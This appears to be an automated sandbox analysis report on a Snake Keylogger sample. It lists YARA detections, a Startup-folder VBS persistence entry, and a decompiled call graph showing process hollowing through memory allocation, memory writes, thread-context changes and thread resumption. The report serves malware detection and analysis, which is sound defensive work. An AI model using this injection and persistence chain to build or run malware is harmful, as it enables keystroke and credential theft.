                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2244743417.00000000076A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:08:59:16
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                                                                        Imagebase:0xb50000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:4
                                                                        Start time:08:59:28
                                                                        Start date:25/11/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                                                                        Imagebase:0x7ff727c10000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:08:59:29
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\ishon.exe"
                                                                        Imagebase:0xca0000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2515782521.0000000004351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 55%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:08:59:44
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\ishon.exe"
                                                                        Imagebase:0xb60000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3315771924.0000000003159000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3312269079.000000000041A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:14.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:3.4%
                                                                          Total number of Nodes:565
                                                                          Total number of Limit Nodes:60
                                                                          execution_graph 70216 7590c98 70217 7590cb5 70216->70217 70218 7590cc5 70217->70218 70223 7596b0b 70217->70223 70226 7591f13 70217->70226 70231 759a07a 70217->70231 70236 7596e3e 70217->70236 70240 759f7d8 70223->70240 70227 759a080 70226->70227 70248 75d0e40 70227->70248 70252 75d0e30 70227->70252 70228 7591508 70232 759a080 70231->70232 70234 75d0e40 2 API calls 70232->70234 70235 75d0e30 2 API calls 70232->70235 70233 7591508 70234->70233 70235->70233 70237 7596e5d 70236->70237 70239 759f7d8 VirtualProtect 70237->70239 70238 7596e81 70239->70238 70242 759f7ff 70240->70242 70244 759fc28 70242->70244 70245 759fc70 VirtualProtect 70244->70245 70247 7596b29 70245->70247 70247->70218 70249 75d0e55 70248->70249 70256 75d0e80 70249->70256 70253 75d0e40 70252->70253 70255 75d0e80 2 API calls 70253->70255 70254 75d0e6d 70254->70228 70255->70254 70258 75d0eb7 70256->70258 70257 75d0e6d 70257->70228 70261 75d0f98 70258->70261 70265 75d0f90 70258->70265 70262 75d0fd8 VirtualAlloc 70261->70262 70264 75d1012 70262->70264 70264->70257 70266 75d0f98 VirtualAlloc 70265->70266 70268 75d1012 70266->70268 70268->70257 70269 762b7a0 70270 762b7aa 70269->70270 70274 77f61a8 70270->70274 70280 77f61b8 70270->70280 70271 762b7e8 70275 77f61b8 70274->70275 70286 77f61eb 70275->70286 70290 77f61f8 70275->70290 70294 77f6327 70275->70294 70276 77f61e3 70276->70271 70281 77f61cd 70280->70281 70283 77f61eb 10 API calls 70281->70283 70284 77f61f8 10 API calls 70281->70284 70285 77f6327 10 API calls 70281->70285 70282 77f61e3 70282->70271 70283->70282 70284->70282 70285->70282 70288 77f61f6 70286->70288 70287 77f6264 70287->70276 70288->70287 70298 77f77b0 70288->70298 70292 77f6222 70290->70292 70291 77f6264 70291->70276 70292->70291 70293 77f77b0 10 API calls 70292->70293 70293->70292 70296 77f6255 70294->70296 70295 77f6264 70295->70276 70296->70295 70297 77f77b0 10 API calls 70296->70297 70297->70296 70299 77f77d5 70298->70299 70314 77f7891 70299->70314 70318 77f7cb8 70299->70318 70322 77f7b94 70299->70322 70326 77f793e 70299->70326 70330 77f79a9 70299->70330 70334 77f7b04 70299->70334 70338 77f78cb 70299->70338 70342 77f7aaa 70299->70342 70346 77f792b 70299->70346 70350 77f780b 70299->70350 70354 77f7810 70299->70354 70358 77f7aec 70299->70358 70362 77f7953 70299->70362 70300 77f77f7 70300->70288 70316 77f7875 70314->70316 70315 77f7930 70315->70300 70316->70315 70366 77f8060 70316->70366 70320 77f7875 70318->70320 70319 77f7930 70319->70300 70320->70319 70321 77f8060 10 API calls 70320->70321 70321->70320 70324 77f7875 70322->70324 70323 77f7930 70323->70300 70324->70323 70325 77f8060 10 API calls 70324->70325 70325->70324 70328 77f7875 70326->70328 70327 77f7930 70327->70300 70328->70327 70329 77f8060 10 API calls 70328->70329 70329->70328 70332 77f7875 70330->70332 70331 77f7930 70331->70300 70332->70331 70333 77f8060 10 API calls 70332->70333 70333->70332 70335 77f7875 70334->70335 70336 77f7930 70335->70336 70337 77f8060 10 API calls 70335->70337 70336->70300 70337->70335 70339 77f7875 70338->70339 70340 77f7930 70339->70340 70341 77f8060 10 API calls 70339->70341 70340->70300 70341->70339 70343 77f7875 70342->70343 70344 77f7930 70343->70344 70345 77f8060 10 API calls 70343->70345 70344->70300 70345->70343 70347 77f7930 70346->70347 70348 77f7875 70346->70348 70347->70300 70348->70347 70349 77f8060 10 API calls 70348->70349 70349->70348 70351 77f783d 70350->70351 70352 77f7930 70351->70352 70353 77f8060 10 API calls 70351->70353 70352->70300 70353->70351 70355 77f783d 70354->70355 70356 77f7930 70355->70356 70357 77f8060 10 API calls 70355->70357 70356->70300 70357->70355 70360 77f7875 70358->70360 70359 77f7930 70359->70300 70360->70359 70361 77f8060 10 API calls 70360->70361 70361->70360 70364 77f7875 70362->70364 70363 77f7930 70363->70300 70364->70363 70365 77f8060 10 API calls 70364->70365 70365->70364 70367 77f806d 70366->70367 70402 77f8483 70367->70402 70407 77f8dcc 70367->70407 70412 77f838b 70367->70412 70417 77f9016 70367->70417 70422 77f8cd1 70367->70422 70427 77f8ed8 70367->70427 70432 77f8a56 70367->70432 70437 77f8c99 70367->70437 70442 77f86d8 70367->70442 70447 77f915b 70367->70447 70452 77f8619 70367->70452 70457 77f8f5e 70367->70457 70462 77f905b 70367->70462 70471 77f9160 70367->70471 70476 77f821e 70367->70476 70484 77f8ba2 70367->70484 70492 77f90e1 70367->70492 70497 77f92a5 70367->70497 70502 77f8b63 70367->70502 70507 77f89e8 70367->70507 70512 77f91a5 70367->70512 70520 77f8729 70367->70520 70525 77f82e8 70367->70525 70530 77f88f2 70367->70530 70538 77f84ab 70367->70538 70544 77f8676 70367->70544 70549 77f9236 70367->70549 70554 77f8578 70367->70554 70559 77f85b8 70367->70559 70564 77f8ffc 70367->70564 70572 77f81fa 70367->70572 70577 77f853d 70367->70577 70582 77f8743 70367->70582 70368 77f80a7 70368->70316 70403 77f81c6 70402->70403 70404 77f813b 70403->70404 70587 77ffe38 70403->70587 70591 77ffe40 70403->70591 70409 77f81c6 70407->70409 70408 77f813b 70409->70408 70410 77ffe38 Wow64SetThreadContext 70409->70410 70411 77ffe40 Wow64SetThreadContext 70409->70411 70410->70409 70411->70409 70413 77f839a 70412->70413 70595 69fe920 70413->70595 70599 69fe928 70413->70599 70414 77f8426 70414->70368 70418 77f81c6 70417->70418 70419 77f813b 70418->70419 70420 77ffe38 Wow64SetThreadContext 70418->70420 70421 77ffe40 Wow64SetThreadContext 70418->70421 70420->70418 70421->70418 70423 77f8ce0 70422->70423 70425 69fe928 WriteProcessMemory 70423->70425 70426 69fe920 WriteProcessMemory 70423->70426 70424 77f8d61 70424->70368 70425->70424 70426->70424 70428 77f81c6 70427->70428 70429 77f813b 70428->70429 70430 77ffe38 Wow64SetThreadContext 70428->70430 70431 77ffe40 Wow64SetThreadContext 70428->70431 70430->70428 70431->70428 70433 77f81c6 70432->70433 70434 77f813b 70433->70434 70435 77ffe38 Wow64SetThreadContext 70433->70435 70436 77ffe40 Wow64SetThreadContext 70433->70436 70435->70433 70436->70433 70438 77f81c6 70437->70438 70439 77f813b 70438->70439 70440 77ffe38 Wow64SetThreadContext 70438->70440 70441 77ffe40 Wow64SetThreadContext 70438->70441 70440->70438 70441->70438 70443 77f81c6 70442->70443 70444 77f813b 70443->70444 70445 77ffe38 Wow64SetThreadContext 70443->70445 70446 77ffe40 Wow64SetThreadContext 70443->70446 70445->70443 70446->70443 70448 77f81c6 70447->70448 70449 77f813b 70448->70449 70450 77ffe38 Wow64SetThreadContext 70448->70450 70451 77ffe40 Wow64SetThreadContext 70448->70451 70450->70448 70451->70448 70453 77f81c6 70452->70453 70454 77f813b 70453->70454 70455 77ffe38 Wow64SetThreadContext 70453->70455 70456 77ffe40 Wow64SetThreadContext 70453->70456 70455->70453 70456->70453 70458 77f81c6 70457->70458 70459 77f813b 70458->70459 70460 77ffe38 Wow64SetThreadContext 70458->70460 70461 77ffe40 Wow64SetThreadContext 70458->70461 70460->70458 70461->70458 70463 77f9073 70462->70463 70603 77f9970 70463->70603 70609 77f9910 70463->70609 70614 77f9900 70463->70614 70464 77f813b 70465 77f81c6 70465->70464 70466 77ffe38 Wow64SetThreadContext 70465->70466 70467 77ffe40 Wow64SetThreadContext 70465->70467 70466->70465 70467->70465 70472 77f81c6 70471->70472 70473 77f813b 70472->70473 70474 77ffe38 Wow64SetThreadContext 70472->70474 70475 77ffe40 Wow64SetThreadContext 70472->70475 70474->70472 70475->70472 70477 77f8227 70476->70477 70632 69fef90 70477->70632 70636 69fef98 70477->70636 70478 77f81c6 70479 77f813b 70478->70479 70480 77ffe38 Wow64SetThreadContext 70478->70480 70481 77ffe40 Wow64SetThreadContext 70478->70481 70480->70478 70481->70478 70485 77f8bac 70484->70485 70640 69fe681 70485->70640 70644 69fe688 70485->70644 70486 77f81c6 70487 77f813b 70486->70487 70490 77ffe38 Wow64SetThreadContext 70486->70490 70491 77ffe40 Wow64SetThreadContext 70486->70491 70490->70486 70491->70486 70493 77f81c6 70492->70493 70494 77f813b 70493->70494 70495 77ffe38 Wow64SetThreadContext 70493->70495 70496 77ffe40 Wow64SetThreadContext 70493->70496 70495->70493 70496->70493 70498 77f81c6 70497->70498 70499 77f813b 70498->70499 70500 77ffe38 Wow64SetThreadContext 70498->70500 70501 77ffe40 Wow64SetThreadContext 70498->70501 70500->70498 70501->70498 70503 77f81c6 70502->70503 70504 77f813b 70503->70504 70505 77ffe38 Wow64SetThreadContext 70503->70505 70506 77ffe40 Wow64SetThreadContext 70503->70506 70505->70503 70506->70503 70508 77f81c6 70507->70508 70509 77f813b 70508->70509 70510 77ffe38 Wow64SetThreadContext 70508->70510 70511 77ffe40 Wow64SetThreadContext 70508->70511 70510->70508 70511->70508 70513 77f91b4 70512->70513 70518 69fe928 WriteProcessMemory 70513->70518 70519 69fe920 WriteProcessMemory 70513->70519 70514 77f81c6 70515 77f813b 70514->70515 70516 77ffe38 Wow64SetThreadContext 70514->70516 70517 77ffe40 Wow64SetThreadContext 70514->70517 70516->70514 70517->70514 70518->70514 70519->70514 70521 77f81c6 70520->70521 70522 77f813b 70521->70522 70523 77ffe38 Wow64SetThreadContext 70521->70523 70524 77ffe40 Wow64SetThreadContext 70521->70524 70523->70521 70524->70521 70526 77f81c6 70525->70526 70527 77f813b 70526->70527 70528 77ffe38 Wow64SetThreadContext 70526->70528 70529 77ffe40 Wow64SetThreadContext 70526->70529 70528->70526 70529->70526 70531 77f8901 70530->70531 70534 77ffe38 Wow64SetThreadContext 70531->70534 70535 77ffe40 Wow64SetThreadContext 70531->70535 70532 77f81c6 70533 77f813b 70532->70533 70536 77ffe38 Wow64SetThreadContext 70532->70536 70537 77ffe40 Wow64SetThreadContext 70532->70537 70534->70532 70535->70532 70536->70532 70537->70532 70539 77f84b0 70538->70539 70540 77f81c6 70538->70540 70539->70368 70541 77f813b 70540->70541 70542 77ffe38 Wow64SetThreadContext 70540->70542 70543 77ffe40 Wow64SetThreadContext 70540->70543 70542->70540 70543->70540 70546 77f81c6 70544->70546 70545 77f813b 70546->70545 70547 77ffe38 Wow64SetThreadContext 70546->70547 70548 77ffe40 Wow64SetThreadContext 70546->70548 70547->70546 70548->70546 70550 77f81c6 70549->70550 70551 77f813b 70550->70551 70552 77ffe38 Wow64SetThreadContext 70550->70552 70553 77ffe40 Wow64SetThreadContext 70550->70553 70552->70550 70553->70550 70555 77f81c6 70554->70555 70556 77f813b 70555->70556 70557 77ffe38 Wow64SetThreadContext 70555->70557 70558 77ffe40 Wow64SetThreadContext 70555->70558 70557->70555 70558->70555 70560 77f81c6 70559->70560 70561 77f813b 70560->70561 70562 77ffe38 Wow64SetThreadContext 70560->70562 70563 77ffe40 Wow64SetThreadContext 70560->70563 70562->70560 70563->70560 70565 77f8bc8 70564->70565 70566 77f81c6 70564->70566 70568 69fe688 VirtualAllocEx 70565->70568 70569 69fe681 VirtualAllocEx 70565->70569 70567 77f813b 70566->70567 70570 77ffe38 Wow64SetThreadContext 70566->70570 70571 77ffe40 Wow64SetThreadContext 70566->70571 70568->70566 70569->70566 70570->70566 70571->70566 70573 77f81c6 70572->70573 70574 77f813b 70573->70574 70575 77ffe38 Wow64SetThreadContext 70573->70575 70576 77ffe40 Wow64SetThreadContext 70573->70576 70575->70573 70576->70573 70578 77f81c6 70577->70578 70579 77f813b 70578->70579 70580 77ffe38 Wow64SetThreadContext 70578->70580 70581 77ffe40 Wow64SetThreadContext 70578->70581 70580->70578 70581->70578 70583 77f81c6 70582->70583 70583->70582 70584 77f813b 70583->70584 70585 77ffe38 Wow64SetThreadContext 70583->70585 70586 77ffe40 Wow64SetThreadContext 70583->70586 70585->70583 70586->70583 70588 77ffe40 Wow64SetThreadContext 70587->70588 70590 77ffecd 70588->70590 70590->70403 70592 77ffe85 Wow64SetThreadContext 70591->70592 70594 77ffecd 70592->70594 70594->70403 70596 69fe928 WriteProcessMemory 70595->70596 70598 69fe9c7 70596->70598 70598->70414 70600 69fe970 WriteProcessMemory 70599->70600 70602 69fe9c7 70600->70602 70602->70414 70604 77f9921 70603->70604 70605 77f997b 70603->70605 70606 77f9970 2 API calls 70604->70606 70608 77f9949 70604->70608 70619 77f9de7 70604->70619 70606->70608 70608->70465 70610 77f9927 70609->70610 70611 77f9949 70610->70611 70612 77f9970 2 API calls 70610->70612 70613 77f9de7 2 API calls 70610->70613 70611->70465 70612->70611 70613->70611 70615 77f9905 70614->70615 70616 77f9970 2 API calls 70615->70616 70617 77f9949 70615->70617 70618 77f9de7 2 API calls 70615->70618 70616->70617 70617->70465 70618->70617 70620 77f9df6 70619->70620 70624 77ff730 70620->70624 70628 77ff724 70620->70628 70625 77ff794 70624->70625 70625->70625 70626 77ff8d4 CreateProcessA 70625->70626 70627 77ff91c 70626->70627 70629 77ff730 70628->70629 70629->70629 70630 77ff8d4 CreateProcessA 70629->70630 70631 77ff91c 70630->70631 70633 69fef98 NtResumeThread 70632->70633 70635 69ff015 70633->70635 70635->70478 70637 69fefe0 NtResumeThread 70636->70637 70639 69ff015 70637->70639 70639->70478 70641 69fe688 VirtualAllocEx 70640->70641 70643 69fe705 70641->70643 70643->70486 70645 69fe6c8 VirtualAllocEx 70644->70645 70647 69fe705 70645->70647 70647->70486 70694 762bc01 70695 762bc0b 70694->70695 70699 69f97d8 70695->70699 70704 69f97e8 70695->70704 70696 762b147 70700 69f97dc 70699->70700 70709 69f9984 70700->70709 70718 69f9a0e 70700->70718 70701 69f9813 70701->70696 70705 69f97fd 70704->70705 70707 69f9a0e 2 API calls 70705->70707 70708 69f9984 2 API calls 70705->70708 70706 69f9813 70706->70696 70707->70706 70708->70706 70712 69f99ad 70709->70712 70710 69f9b2c 70716 69f94a8 VirtualProtect 70710->70716 70717 69f94a1 VirtualProtect 70710->70717 70711 69f9cc7 70711->70701 70712->70710 70712->70711 70714 69f94a8 VirtualProtect 70712->70714 70715 69f94a1 VirtualProtect 70712->70715 70713 69f9b83 70713->70701 70714->70712 70715->70712 70716->70713 70717->70713 70721 69f9a14 70718->70721 70719 69f9b2c 70725 69f94a8 VirtualProtect 70719->70725 70726 69f94a1 VirtualProtect 70719->70726 70720 69f9cc7 70720->70701 70721->70719 70721->70720 70723 69f94a8 VirtualProtect 70721->70723 70724 69f94a1 VirtualProtect 70721->70724 70722 69f9b83 70722->70701 70723->70721 70724->70721 70725->70722 70726->70722 70727 762b387 70728 762b391 70727->70728 70732 69f4d40 70728->70732 70738 69f4d30 70728->70738 70729 762b147 70733 69f4d55 70732->70733 70744 69f4d70 70733->70744 70749 69f4fd5 70733->70749 70754 69f4d80 70733->70754 70734 69f4d6b 70734->70729 70739 69f4d40 70738->70739 70741 69f4fd5 2 API calls 70739->70741 70742 69f4d80 2 API calls 70739->70742 70743 69f4d70 2 API calls 70739->70743 70740 69f4d6b 70740->70729 70741->70740 70742->70740 70743->70740 70746 69f4d74 70744->70746 70745 69f4de9 70745->70734 70746->70745 70759 69f841b 70746->70759 70763 69f8420 70746->70763 70751 69f4dd7 70749->70751 70750 69f4de9 70750->70734 70751->70750 70752 69f841b SleepEx 70751->70752 70753 69f8420 SleepEx 70751->70753 70752->70751 70753->70751 70756 69f4da7 70754->70756 70755 69f4de9 70755->70734 70756->70755 70757 69f841b SleepEx 70756->70757 70758 69f8420 SleepEx 70756->70758 70757->70756 70758->70756 70762 69f841f SleepEx 70759->70762 70761 69f849e 70761->70746 70762->70761 70764 69f8460 SleepEx 70763->70764 70766 69f849e 70764->70766 70766->70746 70686 17e4528 70687 17e4536 70686->70687 70690 17e3cf4 70687->70690 70689 17e453f 70691 17e3cff 70690->70691 70692 17e40d0 2 API calls 70691->70692 70693 17e4565 70692->70693 70693->70689 70648 77fe8b8 70649 77fe906 NtProtectVirtualMemory 70648->70649 70651 77fe950 70649->70651 70652 762bbab 70653 762bbb5 70652->70653 70657 69fd5c8 70653->70657 70661 69fd5d8 70653->70661 70654 762bbf3 70658 69fd5cc 70657->70658 70659 69fd603 70658->70659 70665 77f1430 70658->70665 70659->70654 70662 69fd5db 70661->70662 70663 69fd603 70662->70663 70664 77f1430 2 API calls 70662->70664 70663->70654 70664->70663 70666 77f143f 70665->70666 70670 77f4558 70666->70670 70674 77f454d 70666->70674 70667 77f00b2 70667->70659 70671 77f45ad CopyFileA 70670->70671 70673 77f46af 70671->70673 70675 77f4558 CopyFileA 70674->70675 70677 77f46af 70675->70677 70048 762b568 70049 762b572 70048->70049 70053 77f4938 70049->70053 70059 77f4928 70049->70059 70050 762b5b0 70054 77f494d 70053->70054 70065 77f4978 70054->70065 70072 77f4ab7 70054->70072 70079 77f4969 70054->70079 70055 77f4963 70055->70050 70060 77f494d 70059->70060 70062 77f4969 4 API calls 70060->70062 70063 77f4978 4 API calls 70060->70063 70064 77f4ab7 4 API calls 70060->70064 70061 77f4963 70061->70050 70062->70061 70063->70061 70064->70061 70067 77f49a2 70065->70067 70066 77f4a24 70066->70055 70067->70066 70086 77f5328 70067->70086 70090 77f531c 70067->70090 70094 77f5bc0 70067->70094 70098 77f5bc8 70067->70098 70074 77f4abd 70072->70074 70073 77f4c37 70073->70055 70074->70073 70075 77f5bc8 DuplicateHandle 70074->70075 70076 77f5bc0 DuplicateHandle 70074->70076 70077 77f531c CreateFileA 70074->70077 70078 77f5328 CreateFileA 70074->70078 70075->70074 70076->70074 70077->70074 70078->70074 70080 77f4978 70079->70080 70081 77f4a24 70080->70081 70082 77f5bc8 DuplicateHandle 70080->70082 70083 77f5bc0 DuplicateHandle 70080->70083 70084 77f531c CreateFileA 70080->70084 70085 77f5328 CreateFileA 70080->70085 70081->70055 70082->70080 70083->70080 70084->70080 70085->70080 70087 77f537a CreateFileA 70086->70087 70089 77f5423 70087->70089 70091 77f5328 CreateFileA 70090->70091 70093 77f5423 70091->70093 70095 77f5bc8 DuplicateHandle 70094->70095 70097 77f5c63 70095->70097 70097->70067 70099 77f5c10 DuplicateHandle 70098->70099 70101 77f5c63 70099->70101 70101->70067 70102 762b748 70103 762b74e 70102->70103 70107 69f86ab 70103->70107 70112 69f86b8 70103->70112 70104 762b792 70108 69f86b4 70107->70108 70117 69f87e3 70108->70117 70122 69f88c7 70108->70122 70109 69f86e3 70109->70104 70113 69f86bb 70112->70113 70115 69f88c7 2 API calls 70113->70115 70116 69f87e3 2 API calls 70113->70116 70114 69f86e3 70114->70104 70115->70114 70116->70114 70119 69f8805 70117->70119 70118 69f8af2 70118->70109 70119->70118 70127 69f94a1 70119->70127 70131 69f94a8 70119->70131 70124 69f88cd 70122->70124 70123 69f8af2 70123->70109 70124->70123 70125 69f94a8 VirtualProtect 70124->70125 70126 69f94a1 VirtualProtect 70124->70126 70125->70124 70126->70124 70128 69f94a8 VirtualProtect 70127->70128 70130 69f952b 70128->70130 70130->70119 70132 69f94f0 VirtualProtect 70131->70132 70134 69f952b 70132->70134 70134->70119 70135 17e4550 70136 17e4560 70135->70136 70139 17e40d0 70136->70139 70138 17e4565 70140 17e40db 70139->70140 70143 17e40e0 70140->70143 70142 17e4605 70142->70138 70144 17e40eb 70143->70144 70147 17e4214 70144->70147 70146 17e46e2 70146->70142 70148 17e421f 70147->70148 70151 17e4244 70148->70151 70150 17e47f4 70150->70146 70152 17e424f 70151->70152 70158 17e5434 70152->70158 70154 17e7819 70154->70150 70155 17e75f0 70155->70154 70163 17ec2f8 70155->70163 70168 17ec2e9 70155->70168 70159 17e543f 70158->70159 70160 17e8dda 70159->70160 70173 17e8e38 70159->70173 70177 17e8e29 70159->70177 70160->70155 70164 17ec319 70163->70164 70165 17ec33d 70164->70165 70185 17ec4a8 70164->70185 70189 17ec49a 70164->70189 70165->70154 70169 17ec2f5 70168->70169 70170 17ec33d 70169->70170 70171 17ec49a 2 API calls 70169->70171 70172 17ec4a8 2 API calls 70169->70172 70170->70154 70171->70170 70172->70170 70174 17e8e7b 70173->70174 70175 17e8e86 KiUserCallbackDispatcher 70174->70175 70176 17e8eb0 70174->70176 70175->70176 70176->70160 70178 17e8dbc 70177->70178 70179 17e8e32 70177->70179 70182 17e8dda 70178->70182 70183 17e8e38 KiUserCallbackDispatcher 70178->70183 70184 17e8e29 KiUserCallbackDispatcher 70178->70184 70180 17e8e86 KiUserCallbackDispatcher 70179->70180 70181 17e8eb0 70179->70181 70180->70181 70181->70160 70182->70160 70183->70182 70184->70182 70186 17ec4b5 70185->70186 70187 17ec4ef 70186->70187 70193 17eb030 70186->70193 70187->70165 70190 17ec4a8 70189->70190 70191 17ec4ef 70190->70191 70192 17eb030 2 API calls 70190->70192 70191->70165 70192->70191 70194 17eb03b 70193->70194 70196 17ed208 70194->70196 70197 17ec834 70194->70197 70198 17ec83f 70197->70198 70199 17e4244 2 API calls 70198->70199 70200 17ed277 70199->70200 70200->70196 70201 17ec5c0 70202 17ec606 70201->70202 70203 17ec6f3 70202->70203 70206 17ecb99 70202->70206 70210 17ecba8 70202->70210 70207 17ecba8 70206->70207 70213 17ec7d4 70207->70213 70211 17ec7d4 DuplicateHandle 70210->70211 70212 17ecbd6 70211->70212 70212->70203 70214 17ecc10 DuplicateHandle 70213->70214 70215 17ecbd6 70214->70215 70215->70203 70678 17ea230 70681 17ea328 70678->70681 70679 17ea23f 70682 17ea35c 70681->70682 70683 17ea339 70681->70683 70682->70679 70683->70682 70684 17ea560 GetModuleHandleW 70683->70684 70685 17ea58d 70684->70685 70685->70679

                                                                          Executed Functions

                                                                          Function 077503C9 Relevance: 16.2, Strings: 12, Instructions: 1152COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
